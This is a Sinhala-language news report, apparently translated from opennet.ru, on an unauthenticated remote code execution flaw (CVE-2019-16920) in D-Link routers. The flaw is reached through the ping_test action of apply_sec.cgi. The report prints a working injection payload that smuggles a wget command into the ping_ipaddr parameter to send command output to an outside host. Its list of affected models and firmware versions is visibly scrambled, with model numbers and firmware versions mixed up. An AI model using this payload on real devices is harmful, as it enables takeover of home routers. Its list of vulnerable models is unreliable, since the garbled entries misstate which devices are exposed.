D-Link රවුටරවල දුරස්ථව භාවිතා කළ හැකි අවදානම

D-Link රැහැන් රහිත රවුටර වල හඳුනාගෙන ඇත භයානක අවදානම (CVE-2019–16920), සත්‍යාපනයකින් තොරව ප්‍රවේශ විය හැකි, "ping_test" හසුරුවන්න වෙත විශේෂ ඉල්ලීමක් යැවීමෙන් ඔබට උපාංග පැත්තේ දුරස්ථව කේතය ක්‍රියාත්මක කිරීමට ඉඩ සලසයි.

සිත්ගන්නා කරුණ නම්, ස්ථිරාංග සංවර්ධකයින්ට අනුව, “ping_test” ඇමතුම ක්‍රියාත්මක කළ යුත්තේ සත්‍යාපනය කිරීමෙන් පසුව පමණි, නමුත් යථාර්ථයේ දී එය වෙබ් අතුරු මුහුණතට ලොග් වීම නොසලකා ඕනෑම අවස්ථාවක හැඳින්වේ. විශේෂයෙන්ම, apply_sec.cgi ස්ක්‍රිප්ට් වෙත ප්‍රවේශ වන විට සහ “action=ping_test” පරාමිතිය පසු කරන විට, ස්ක්‍රිප්ට් සත්‍යාපන පිටුවට හරවා යවයි, නමුත් ඒ සමඟම ping_test හා සම්බන්ධ ක්‍රියාව සිදු කරයි. කේතය ක්‍රියාත්මක කිරීම සඳහා, ping_test තුළම වෙනත් අවදානමක් භාවිතා කරන ලදී, එය පරීක්ෂණය සඳහා යවන ලද IP ලිපිනයේ නිවැරදි භාවය නිසි ලෙස පරීක්ෂා නොකර ping උපයෝගීතාව අමතයි. උදාහරණයක් ලෙස, wget උපයෝගීතාව ඇමතීමට සහ "echo 1234" විධානයේ ප්‍රතිඵල බාහිර ධාරකයකට මාරු කිරීමට, "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" පරාමිතිය සඳහන් කරන්න. test.test/?$( echo 1234)".

D-Link රවුටරවල දුරස්ථව භාවිතා කළ හැකි අවදානම

අනාරක්ෂිත බව පහත දැක්වෙන ආකෘතිවල නිල වශයෙන් තහවුරු කර ඇත:

  • ස්ථිරාංග 655b3.02 හෝ ඊට වැඩි DIR-05;
  • ස්ථිරාංග 866b1.03 හෝ ඊට වැඩි DIR-04L;
  • ස්ථිරාංග 1565 හෝ ඊට වැඩි DIR-1.01;
  • DIR-652 (ගැටළු සහිත ස්ථිරාංග අනුවාද පිළිබඳ තොරතුරු සපයා නැත)

මෙම ආකෘති සඳහා ආධාරක කාලය දැනටමත් කල් ඉකුත් වී ඇත, එබැවින් D-Link ප්රකාශ කළේය, අවදානම ඉවත් කිරීම සඳහා ඔවුන් සඳහා යාවත්කාලීන නිකුත් නොකරනු ඇත, ඒවා භාවිතා කිරීම නිර්දේශ නොකරන අතර නව උපාංග සමඟ ඒවා ප්රතිස්ථාපනය කිරීමට උපදෙස් දෙයි. ආරක්ෂක පිළියමක් ලෙස, ඔබට විශ්වාසදායක IP ලිපිනවලට පමණක් වෙබ් අතුරු මුහුණත වෙත ප්‍රවේශය සීමා කළ හැක.

පසුව අනාවරණය වූයේ එම අවදානමද ඇති බවයි බලපානවා මාදිලි DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 සහ DIR-825, යාවත්කාලීන නිකුත් කිරීමට සැලසුම් කර ඇත.

මූලාශ්රය: opennet.ru

අදහස් එක් කරන්න